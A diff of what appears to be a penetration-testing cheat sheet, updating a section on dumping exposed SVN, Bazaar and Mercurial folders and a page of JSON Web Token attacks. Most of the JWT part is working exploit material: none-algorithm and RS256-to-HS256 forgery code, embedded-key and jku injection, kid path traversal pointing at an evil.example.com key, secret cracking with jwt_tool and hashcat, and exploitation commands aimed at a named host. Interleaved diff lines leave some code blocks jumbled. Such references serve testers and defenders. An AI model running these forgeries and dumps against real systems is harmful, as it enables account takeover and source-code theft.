@@ -194,26 +241,30 @@ curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
 2. Download interesting files
    * remove \$sha1\$ prefix
    * add .svn-base postfix
-    * use first two signs from hash as folder name inside pristine/ directory (94 in this case)
+    * use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case)
    * create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
-### Automatic way : svn-extractor
+### Tools
 #### svn-extractor
 ```powershell
 git clone https://github.com/anantshri/svn-extractor.git
 python svn-extractor.py –url "url with .svn available"
 ```
-## BAZAAR - Source code management
+## Bazaar
-### Automatic way : rip-bzr.pl
+### Tools
 #### rip-bzr.pl
 ```powershell
 wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl
-docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-git.pl -v -u  
+docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u
 ```
-### Automatic way : bzr_dumper
+#### bzr_dumper
 ```powershell
 git clone https://github.com/SeahunOh/bzr_dumper
@@ -238,18 +289,19 @@ $ bzr revert
 N  static/   
 ```
-## Leaked API keys
+## Mercurial
-If you find any key , use the [keyhacks](https://github.com/streaak/keyhacks) from @streaak to verifiy them.
+### Tools
-Twilio example :
+#### rip-hg.pl
 ```powershell
-curl -X GET 'https://api.twilio.com/2010-04-01/Accounts/ACCOUNT_SID/Keys.json' -u ACCOUNT_SID:AUTH_TOKEN
+wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-hg.pl
 docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-hg.pl -v -u
 ```
 ## References
 - [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks)
 - [bl4de, diggit](https://github.com/bl4de/security-tools/tree/master/diggit)
- [Gitrob: Now in Go - Michael Henriksen](https://michenriksen.com/blog/gitrob-now-in-go/)
+- [Gitrob: Now in Go - Michael Henriksen](https://michenriksen.com/blog/gitrob-now-in-go/)
--- a/Token/README.md
+++ b/Token/README.md
@@ -4,16 +4,35 @@
 ## Summary 
- JWT Format
+- [Summary](#summary)
- JWT Signature - None algorithm
+- [Tools](#tools)
- JWT Signature - RS256 to HS256
+- [JWT Format](#jwt-format)
- Breaking JWT's secret
+  - [Header](#header)
  - [Payload](#payload)
 - [JWT Signature](#jwt-signature)
    - [JWT Signature - Null Signature Attack (CVE-2020-28042)](#jwt-signature---null-signature-attack-cve-2020-28042)
    - [JWT Signature - Disclosure of a correct signature (CVE-2019-7644)](#jwt-signature---disclosure-of-a-correct-signature-cve-2019-7644)
    - [JWT Signature - None Algorithm (CVE-2015-9235)](#jwt-signature---none-algorithm-cve-2015-9235)
    - [JWT Signature - Key Confusion Attack RS256 to HS256 (CVE-2016-5431)](#jwt-signature---key-confusion-attack-rs256-to-hs256-cve-2016-5431)
    - [JWT Signature - Key Injection Attack (CVE-2018-0114)](#jwt-signature---key-injection-attack-cve-2018-0114)
    - [JWT Signature - Recover Public Key From Signed JWTs](#jwt-signature---recover-public-key-from-signed-jwts)
 - [JWT Secret](#jwt-secret)
  - [Encode and Decode JWT with the secret](#encode-and-decode-jwt-with-the-secret)
  - [Break JWT secret](#break-jwt-secret)
    - [JWT tool](#jwt-tool)
    - [Hashcat](#hashcat)
 - [JWT Claims](#jwt-claims)
    - [JWT kid Claim Misuse](#jwt-kid-claim-misuse)
    - [JWKS - jku header injection](#jwks---jku-header-injection)
 - [References](#references)
 ## Tools
- [jwt_tool](https://github.com/ticarpi/jwt_tool)
+- [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool)
- [c-jwt-cracker](https://github.com/brendan-rius/c-jwt-cracker)
+- [brendan-rius/c-jwt-cracker](https://github.com/brendan-rius/c-jwt-cracker)
 - [JOSEPH - JavaScript Object Signing and Encryption Pentesting Helper](https://portswigger.net/bappstore/82d6c60490b540369d6d5d01822bdf61)
 - [jwt.io - Encoder – Decoder](https://jwt.io/)
 ## JWT Format
@@ -31,8 +50,8 @@ UL9Pz5HbaMdZCV9cS9OcpccjrlkcmLovL2A2aiKiAOY # signature
 ### Header
-Default algorithm is "HS256" (HMAC SHA256 symmetric encryption).
+Registered header parameter names defined in [JSON Web Signature (JWS) RFC](https://www.rfc-editor.org/rfc/rfc7515).
-"RS256" is used for asymmetric purposes (RSA asymmetric encryption and private key signature).
+The most basic JWT header is the following JSON.
 ```json
 {
@@ -41,6 +60,45 @@ Default algorithm is "HS256" (HMAC SHA256 symmetric encryption).
 }
 ```
 Other parameters are registered in the RFC.
 | Parameter | Definition                           | Description |
 |-----------|--------------------------------------|-------------|
 | alg       | Algorithm                            | Identifies the cryptographic algorithm used to secure the JWS |
 | jku       | JWK Set URL                          | Refers to a resource for a set of JSON-encoded public keys    |
 | jwk       | JSON Web Key                         | The public key used to digitally sign the JWS                 |
 | kid       | Key ID                               | The key used to secure the JWS                                |
 | x5u       | X.509 URL                            | URL for the X.509 public key certificate or certificate chain |
 | x5c       | X.509 Certificate Chain              | X.509 public key certificate or certificate chain in PEM-encoded used to digitally sign the JWS |
 | x5t       | X.509 Certificate SHA-1 Thumbprint)  | Base64 url-encoded SHA-1 thumbprint (digest) of the DER encoding of the X.509 certificate       |
 | x5t#S256  | X.509 Certificate SHA-256 Thumbprint | Base64 url-encoded SHA-256 thumbprint (digest) of the DER encoding of the X.509 certificate     |
 | typ       | Type                                 | Media Type. Usually `JWT` |
 | cty       | Content Type                         | This header parameter is not recommended to use |
 | crit      | Critical                             | Extensions and/or JWA are being used |
 Default algorithm is "HS256" (HMAC SHA256 symmetric encryption).
 "RS256" is used for asymmetric purposes (RSA asymmetric encryption and private key signature).
 | `alg` Param Value  | Digital Signature or MAC Algorithm | Requirements |
 |-------|------------------------------------------------|---------------|
 | HS256 | HMAC using SHA-256                             | Required      |
 | HS384 | HMAC using SHA-384                             | Optional      |
 | HS512 | HMAC using SHA-512                             | Optional      |
 | RS256	| RSASSA-PKCS1-v1_5 using SHA-256                | Recommended   |
 | RS384 | RSASSA-PKCS1-v1_5 using SHA-384                | Optional      |
 | RS512 | RSASSA-PKCS1-v1_5 using SHA-512                | Optional      |
 | ES256 | ECDSA using P-256 and SHA-256	                 | Recommended   |
 | ES384 | ECDSA using P-384 and SHA-384                  | Optional      |
 | ES512 | ECDSA using P-521 and SHA-512	                 | Optional      |
 | PS256 | RSASSA-PSS using SHA-256 and MGF1 with SHA-256 | Optional      |
 | PS384 | RSASSA-PSS using SHA-384 and MGF1 with SHA-384 | Optional      |
 | PS512 | RSASSA-PSS using SHA-512 and MGF1 with SHA-512 | Optional      |
 | none	| No digital signature or MAC performed          | Required      |
 Inject headers with [ticarpi/jwt_tool](#): `python3 jwt_tool.py JWT_HERE -I -hc header1 -hv testval1 -hc header2 -hv testval2`
 ### Payload
 ```json
@@ -61,55 +119,81 @@ Claims are the predefined keys and their values:
 - sub: subject of the token (rarely used)
 - aud: audience of the token (also rarely used)
-JWT Encoder – Decoder: `http://jsonwebtoken.io`
+Inject payload claims with [ticarpi/jwt_tool](#): `python3 jwt_tool.py JWT_HERE -I -pc payload1 -pv testval3`
 ## JWT Signature - None algorithm
-JWT supports a None algorithm for signature. This was probably introduced to debug applications. However, this can have a severe impact on the security of the application.
+## JWT Signature
-To exploit this vulnerability, you just need to decode the JWT and change the algorithm used for the signature. Then you can submit your new JWT.
+### JWT Signature - Null Signature Attack (CVE-2020-28042)
-However, this won't work unless you **remove** the signature
+Send a JWT with HS256 algorithm without a signature like `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.`
-The following code is a basic test for a None algorithm.
+**Exploit**:
-
+```ps1
-```python
+python3 jwt_tool.py JWT_HERE -X n
 import jwt
 import base64
 def b64urlencode(data):
    return base64.b64encode(data).replace('+', '-').replace('/', '_').replace('=', '')
 print b64urlencode("{\"typ\":\"JWT\",\"alg\":\"none\"}") + \
    '.' + b64urlencode("{\"data\":\"test\"}") + '.'
 ```
 **Deconstructed**:
 ```json
 {"alg":"HS256","typ":"JWT"}.
 {"sub":"1234567890","name":"John Doe","iat":1516239022}
 ```
 ### JWT Signature - Disclosure of a correct signature (CVE-2019-7644)
 Send a JWT with an incorrect signature, the endpoint might respond with an error disclosing the correct one.
 * [jwt-dotnet/jwt: Critical Security Fix Required: You disclose the correct signature with each SignatureVerificationException... #61](https://github.com/jwt-dotnet/jwt/issues/61)
 * [CVE-2019-7644: Security Vulnerability in Auth0-WCF-Service-JWT](https://auth0.com/docs/secure/security-guidance/security-bulletins/cve-2019-7644)
 ```
 Invalid signature. Expected SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c got 9twuPVu9Wj3PBneGw1ctrf3knr7RX12v-UwocfLhXIs
 Invalid signature. Expected 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgB1Y= got 8Qh5lJ5gSaQylkSdaCIDBoOqKzhoJ0Nutkkap8RgBOo=
 ```
 ### JWT Signature - None Algorithm (CVE-2015-9235)
 JWT supports a `None` algorithm for signature. This was probably introduced to debug applications. However, this can have a severe impact on the security of the application.
 None algorithm variants:
 * none 
 * None
 * NONE
 * nOnE
 To exploit this vulnerability, you just need to decode the JWT and change the algorithm used for the signature. Then you can submit your new JWT. However, this won't work unless you **remove** the signature
 Alternatively you can modify an existing JWT (be careful with the expiration time)
-```python
+* Using [ticarpi/jwt_tool](#)
-#!/usr/bin/python
+    ```ps1
-# -*- coding: utf-8 -*-
+    python3 jwt_tool.py [JWT_HERE] -X a
    ```
-jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ"
+* Manually editing the JWT
-header, payload, signature  = jwt.split('.')
+    ```python
    import jwt
-# Replacing the ALGO and the payload username
+    jwtToken = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ'
-header  = header.decode('base64').replace('HS256',"none")
+    decodedToken = jwt.decode(jwtToken, verify=False)  					
 payload = (payload+"==").decode('base64').replace('test','admin')
-header  = header.encode('base64').strip().replace("=","")
+    # decode the token before encoding with type 'None'
-payload = payload.encode('base64').strip().replace("=","")
+    noneEncoded = jwt.encode(decodedToken, key='', algorithm=None)
-# 'The algorithm 'none' is not supported'
+    print(noneEncoded.decode())
-print( header+"."+payload+".")
+    ```
 ```
 ## JWT Signature - RS256 to HS256
-Because the public key can sometimes be obtained by the attacker, the attacker can modify the algorithm in the header to HS256 and then use the RSA public key to sign the data.
+### JWT Signature - Key Confusion Attack RS256 to HS256 (CVE-2016-5431)
-> The algorithm HS256 uses the secret key to sign and verify each message.
+If a server’s code is expecting a token with "alg" set to RSA, but receives a token with "alg" set to HMAC, it may inadvertently use the public key as the HMAC symmetric key when verifying the signature.
-> The algorithm RS256 uses the private key to sign the message and uses the public key for authentication.
+
 Because the public key can sometimes be obtained by the attacker, the attacker can modify the algorithm in the header to HS256 and then use the RSA public key to sign the data. When the applications use the same RSA key pair as their TLS web server: `openssl s_client -connect example.com:443 | openssl x509 -pubkey -noout`
 > The algorithm **HS256** uses the secret key to sign and verify each message.
 > The algorithm **RS256** uses the private key to sign the message and uses the public key for authentication.
 ```python
 import jwt
@@ -118,45 +202,136 @@ print public
 print jwt.encode({"data":"test"}, key=public, algorithm='HS256')
 ```
-Note: This behavior is fixed in the python library and will return this error `jwt.exceptions.InvalidKeyError: The specified key is an asymmetric key or x509 certificate and should not be used as an HMAC secret.`. You need to install the following version
+:warning: This behavior is fixed in the python library and will return this error `jwt.exceptions.InvalidKeyError: The specified key is an asymmetric key or x509 certificate and should not be used as an HMAC secret.`. You need to install the following version: `pip install pyjwt==0.4.3`.
-`pip install pyjwt==0.4.3`.
+* Using [ticarpi/jwt_tool](#)
    ```ps1
    python3 jwt_tool.py JWT_HERE -X k -pk my_public.pem
    ```
 * Using [portswigger/JWT Editor](https://portswigger.net/bappstore/26aaa5ded2f74beea19e2ed8345a93dd)
    1. Find the public key, usually in `/jwks.json` or `/.well-known/jwks.json`
    2. Load it in the JWT Editor Keys tab, click `New RSA Key`.
    3. . In the dialog, paste the JWK that you obtained earlier: `{"kty":"RSA","e":"AQAB","use":"sig","kid":"961a...85ce","alg":"RS256","n":"16aflvW6...UGLQ"}`
    4. Select the PEM radio button and copy the resulting PEM key.
    5. Go to the Decoder tab and Base64-encode the PEM.
    6. Go back to the JWT Editor Keys tab and generate a `New Symmetric Key` in JWK format.
    7. Replace the generated value for the k parameter with a Base64-encoded PEM key that you just copied.
    8. Edit the JWT token alg to `HS256` and the data.
    9. Click `Sign` and keep the option: `Don't modify header`
-## Breaking JWT's secret
+* Manually using the following steps to edit an RS256 JWT token into an HS256
    1. Convert our public key (key.pem) into HEX with this command.
-Encode/Decode JWT with the secret.
+        ```powershell
        $ cat key.pem | xxd -p | tr -d "\\n"
        2d2d2d2d2d424547494e20505[STRIPPED]592d2d2d2d2d0a
        ```
-```python
+    2. Generate HMAC signature by supplying our public key as ASCII hex and with our token previously edited.
 import jwt
 encoded = jwt.encode({'some': 'payload'}, 'secret', algorithm='HS256') # encode with 'secret'
-encoded = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE"
+        ```powershell
-jwt.decode(encoded, 'Sn1f', algorithms=['HS256']) # decode with 'Sn1f' as the secret key
+        $ echo -n "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IjIzIiwidXNlcm5hbWUiOiJ2aXNpdG9yIiwicm9sZSI6IjEifQ" | openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e20505[STRIPPED]592d2d2d2d2d0a
-# result
+        (stdin)= 8f421b351eb61ff226df88d526a7e9b9bb7b8239688c1f862f261a0c588910e0
-{u'admin': True, u'sub': u'1234567890', u'name': u'John Doe'}
+        ```
    3. Convert signature (Hex to "base64 URL")
        ```powershell
        $ python2 -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('8f421b351eb61ff226df88d526a7e9b9bb7b8239688c1f862f261a0c588910e0')).replace('=','')\")"
        ```
    4. Add signature to edited payload
        ```powershell
        [HEADER EDITED RS256 TO HS256].[DATA EDITED].[SIGNATURE]
        eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IjIzIiwidXNlcm5hbWUiOiJ2aXNpdG9yIiwicm9sZSI6IjEifQ.j0IbNR62H_Im34jVJqfpubt7gjlojB-GLyYaDFiJEOA
        ```
 ### JWT Signature - Key Injection Attack (CVE-2018-0114)
 > A vulnerability in the Cisco node-jose open source library before 0.11.0 could allow an unauthenticated, remote attacker to re-sign tokens using a key that is embedded within the token. The vulnerability is due to node-jose following the JSON Web Signature (JWS) standard for JSON Web Tokens (JWTs). This standard specifies that a JSON Web Key (JWK) representing a public key can be embedded within the header of a JWS. This public key is then trusted for verification. An attacker could exploit this by forging valid JWS objects by removing the original signature, adding a new public key to the header, and then signing the object using the (attacker-owned) private key associated with the public key embedded in that JWS header.
 **Exploit**:
 * Using [ticarpi/jwt_tool]
    ```ps1
    python3 jwt_tool.py [JWT_HERE] -X i
    ```
 * Using [portswigger/JWT Editor](#)
    1. Add a `New RSA key`
    2. In the JWT's Repeater tab, edit data
    3. `Attack` > `Embedded JWK`
 **Deconstructed**:
 ```json
 {
  "alg": "RS256",
  "typ": "JWT",
  "jwk": {
    "kty": "RSA",
    "kid": "jwt_tool",
    "use": "sig",
    "e": "AQAB",
    "n": "uKBGiwYqpqPzbK6_fyEp71H3oWqYXnGJk9TG3y9K_uYhlGkJHmMSkm78PWSiZzVh7Zj0SFJuNFtGcuyQ9VoZ3m3AGJ6pJ5PiUDDHLbtyZ9xgJHPdI_gkGTmT02Rfu9MifP-xz2ZRvvgsWzTPkiPn-_cFHKtzQ4b8T3w1vswTaIS8bjgQ2GBqp0hHzTBGN26zIU08WClQ1Gq4LsKgNKTjdYLsf0e9tdDt8Pe5-KKWjmnlhekzp_nnb4C2DMpEc1iVDmdHV2_DOpf-kH_1nyuCS9_MnJptF1NDtL_lLUyjyWiLzvLYUshAyAW6KORpGvo2wJa2SlzVtzVPmfgGW7Chpw"
  }
 }.
 {"login":"admin"}.
 [Signed with new Private key; Public key injected]
 ```
 ### JWT tool
-First, bruteforce the "secret" key used to compute the signature.
+### JWT Signature - Recover Public Key From Signed JWTs
 The RS256, RS384 and RS512 algorithms use RSA with PKCS#1 v1.5 padding as their signature scheme. This has the property that you can compute the public key given two different messages and accompanying signatures. 
 [SecuraBV/jws2pubkey](https://github.com/SecuraBV/jws2pubkey): compute an RSA public key from two signed JWTs
 ```ps1
 $ docker run -it ttervoort/jws2pubkey JWS1 JWS2
 $ docker run -it ttervoort/jws2pubkey "$(cat sample-jws/sample1.txt)" "$(cat sample-jws/sample2.txt)" | tee pubkey.jwk
 Computing public key. This may take a minute...
 {"kty": "RSA", "n": "sEFRQzskiSOrUYiaWAPUMF66YOxWymrbf6PQqnCdnUla8PwI4KDVJ2XgNGg9XOdc-jRICmpsLVBqW4bag8eIh35PClTwYiHzV5cbyW6W5hXp747DQWan5lIzoXAmfe3Ydw65cXnanjAxz8vqgOZP2ptacwxyUPKqvM4ehyaapqxkBbSmhba6160PEMAr4d1xtRJx6jCYwQRBBvZIRRXlLe9hrohkblSrih8MdvHWYyd40khrPU9B2G_PHZecifKiMcXrv7IDaXH-H_NbS7jT5eoNb9xG8K_j7Hc9mFHI7IED71CNkg9RlxuHwELZ6q-9zzyCCcS426SfvTCjnX0hrQ", "e": "AQAB"}
 ```
 ## JWT Secret
 > To create a JWT, a secret key is used to sign the header and payload, which generates the signature. The secret key must be kept secret and secure to prevent unauthorized access to the JWT or tampering with its contents. If an attacker is able to access the secret key, they can create, modify or sign their own tokens, bypassing the intended security controls.
 ### Encode and Decode JWT with the secret
 * Using [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool): 
    ```ps1
    jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiSm9obiBEb2UifQ.xuEv8qrfXu424LZk8bVgr9MQJUIrp1rHcPyZw_KSsds
    jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiSm9obiBEb2UifQ.xuEv8qrfXu424LZk8bVgr9MQJUIrp1rHcPyZw_KSsds -T
    Token header values:
    [+] alg = "HS256"
    [+] typ = "JWT"
    Token payload values:
    [+] name = "John Doe"
    ```
 * Using [pyjwt](https://pyjwt.readthedocs.io/en/stable/): `pip install pyjwt`
    ```python
    import jwt
    encoded = jwt.encode({'some': 'payload'}, 'secret', algorithm='HS256')
    jwt.decode(encoded, 'secret', algorithms=['HS256']) 
    ```
 ### Break JWT secret
 Useful list of 3502 public-available JWT: [wallarm/jwt-secrets/jwt.secrets.list](https://github.com/wallarm/jwt-secrets/blob/master/jwt.secrets.list), including `your_jwt_secret`, `change_this_super_secret_random_string`, etc.
 #### JWT tool
 First, bruteforce the "secret" key used to compute the signature using [ticarpi/jwt_tool](https://github.com/ticarpi/jwt_tool)
 ```powershell
-git clone https://github.com/ticarpi/jwt_tool
+python3 -m pip install termcolor cprint pycryptodomex requests
-python2.7 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI /tmp/wordlist
+python3 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI -d /tmp/wordlist -C
 Token header values:
 [+] alg = HS256
 [+] typ = JWT
 Token payload values:
 [+] sub = 1234567890
 [+] role = user
 [+] iat = 1516239022
 File loaded: /tmp/wordlist
 Testing 5 passwords...
 [+] secret is the CORRECT key!
 ```
 Then edit the field inside the JSON Web Token.
@@ -170,8 +345,7 @@ Please enter new value and hit ENTER
 [3] iat = 1516239022
 [0] Continue to next step
-Please select a field number:
+Please select a field number (or 0 to Continue):
 (or 0 to Continue)
 > 0
 ```
@@ -190,7 +364,7 @@ Please select an option from above (1-4):
 Please enter the known key:
 > secret
-Please enter the keylength:
+Please enter the key length:
 [1] HMAC-SHA256
 [2] HMAC-SHA384
 [3] HMAC-SHA512
@@ -201,34 +375,156 @@ Your new forged token:
 [+] Standard: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.xbUXlOQClkhXEreWmB3da/xtBsT0Kjw7truyhDwF5Ic
 ```
-### JWT cracker
+* Recon: `python3 jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw`
 * Scanning: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -M pb`
 * Exploitation: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -X i -I -pc name -pv admin`
 * Fuzzing: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -I -hc kid -hv custom_sqli_vectors.txt`
 * Review: `python3 jwt_tool.py -t https://www.ticarpi.com/ -rc "jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po;anothercookie=test" -X i -I -pc name -pv admin`
-```bash
+
-git clone https://github.com/brendan-rius/c-jwt-cracker
+#### Hashcat
-./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE
+
-Secret is "Sn1f"
+> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](https://twitter.com/hashcat/status/955154646494040065)
 * Dictionary attack: `hashcat -a 0 -m 16500 jwt.txt wordlist.txt`
 * Rule-based attack: `hashcat -a 0 -m 16500 jwt.txt passlist.txt -r rules/best64.rule`
 * Brute force attack: `hashcat -a 3 -m 16500 jwt.txt ?u?l?l?l?l?l?l?l -i --increment-min=6`
 ## JWT Claims
 [IANA's JSON Web Token Claims](https://www.iana.org/assignments/jwt/jwt.xhtml)
 ### JWT kid Claim Misuse
 The "kid" (key ID) claim in a JSON Web Token (JWT) is an optional header parameter that is used to indicate the identifier of the cryptographic key that was used to sign or encrypt the JWT. It is important to note that the key identifier itself does not provide any security benefits, but rather it enables the recipient to locate the key that is needed to verify the integrity of the JWT.
 * Example #1 : Local file
    ```json
    {
    "alg": "HS256",
    "typ": "JWT",
    "kid": "/root/res/keys/secret.key"
    }
    ```
 * Example #2 : Remote file
    ```json
    {
        "alg":"RS256",
        "typ":"JWT",
        "kid":"http://localhost:7070/privKey.key"
    }
    ```
 The content of the file specified in the kid header will be used to generate the signature.
 ```js
 // Example for HS256
 HMACSHA256(
  base64UrlEncode(header) + "." +
  base64UrlEncode(payload),
  your-256-bit-secret-from-secret.key
 )
 ```
-### Hashcat
+The common ways to misuse the kid header:
 * Get the key content to change the payload
 * Change the key path to force your own
    ```py
    >>> jwt.encode(
    ...     {"some": "payload"},
    ...     "secret",
    ...     algorithm="HS256",
    ...     headers={"kid": "http://evil.example.com/custom.key"},
    ... )
    ```
-> Support added to crack JWT (JSON Web Token) with hashcat at 365MH/s on a single GTX1080 - [src](twitter.com/hashcat/status/955154646494040065)
+* Change the key path to a file with a predictable content.
  ```ps1
  python3 jwt_tool.py <JWT> -I -hc kid -hv "../../dev/null" -S hs256 -p ""
  python3 jwt_tool.py <JWT> -I -hc kid -hv "/proc/sys/kernel/randomize_va_space" -S hs256 -p "2"
  ```
-```bash
+* Modify the kid header to attempt SQL and Command Injections
-/hashcat -m 16500 hash.txt -a 3 -w 3 ?a?a?a?a?a?a
+
-eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
+
 ### JWKS - jku header injection
 "jku" header value points to the URL of the JWKS file. By replacing the "jku" URL with an attacker-controlled URL containing the Public Key, an attacker can use the paired Private Key to sign the token and let the service retrieve the malicious Public Key and verify the token.
 It is sometimes exposed publicly via a standard endpoint:
 * `/jwks.json`
 * `/.well-known/jwks.json`
 * `/openid/connect/jwks.json`
 * `/api/keys`
 * `/api/v1/keys`
 * [`/{tenant}/oauth2/v1/certs`](https://docs.theidentityhub.com/doc/Protocol-Endpoints/OpenID-Connect/OpenID-Connect-JWKS-Endpoint.html)
 You should create your own key pair for this attack and host it. It should look like that:
 ```json
 {
    "keys": [
        {
            "kid": "beaefa6f-8a50-42b9-805a-0ab63c3acc54",
            "kty": "RSA",
            "e": "AQAB",
            "n": "nJB2vtCIXwO8DN[...]lu91RySUTn0wqzBAm-aQ"
        }
    ]
 }
 ```
 **Exploit**:
 * Using [ticarpi/jwt_tool]
    ```ps1
    python3 jwt_tool.py JWT_HERE -X s
    python3 jwt_tool.py JWT_HERE -X s -ju http://example.com/jwks.json
    ```
 * Using [portswigger/JWT Editor](#)
    1. Generate a new RSA key and host it
    2. Edit JWT's data
    3. Replace the `kid` header with the one from your JWKS
    4. Add a `jku` header and sign the JWT (`Don't modify header` option should be checked)
 **Deconstructed**:
 ```json
 {"typ":"JWT","alg":"RS256", "jku":"https://example.com/jwks.json", "kid":"id_of_jwks"}.
 {"login":"admin"}.
 [Signed with new Private key; Public key exported]
 ```
 ## Labs 
 * [JWT authentication bypass via unverified signature](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-unverified-signature)
 * [JWT authentication bypass via flawed signature verification](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification)
 * [JWT authentication bypass via weak signing key](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-weak-signing-key)
 * [JWT authentication bypass via jwk header injection](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jwk-header-injection)
 * [JWT authentication bypass via jku header injection](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-jku-header-injection)
 * [JWT authentication bypass via kid header path traversal](https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-kid-header-path-traversal)
 ## References
- [Hacking JSON Web Token (JWT) - Hate_401](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)
+- [5 Easy Steps to Understanding JSON Web Token](https://medium.com/cyberverse/five-easy-steps-to-understand-json-web-tokens-jwt-7665d2ddf4d5)
 - [WebSec CTF - Authorization Token - JWT Challenge](https://ctf.rip/websec-ctf-authorization-token-jwt-challenge/)
 - [Privilege Escalation like a Boss - October 27, 2018 - janijay007](https://blog.securitybreached.org/2018/10/27/privilege-escalation-like-a-boss/)
 - [5 Easy Steps to Understanding JSON Web Token](https://medium.com/vandium-software/5-easy-steps-to-understanding-json-web-tokens-jwt-1164c0adfcec)
 - [Hacking JSON Web Tokens - From Zero To Hero Without Effort - Websecurify Blog](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
 - [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng)](https://nandynarwhals.org/hitbgsec2017-pasty/)
 - [Critical vulnerabilities in JSON Web Token libraries - March 31, 2015 - Tim McLean](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries//)
 - [Learn how to use JSON Web Tokens (JWT) for Authentication - @dwylhq](https://github.com/dwyl/learn-json-web-tokens)
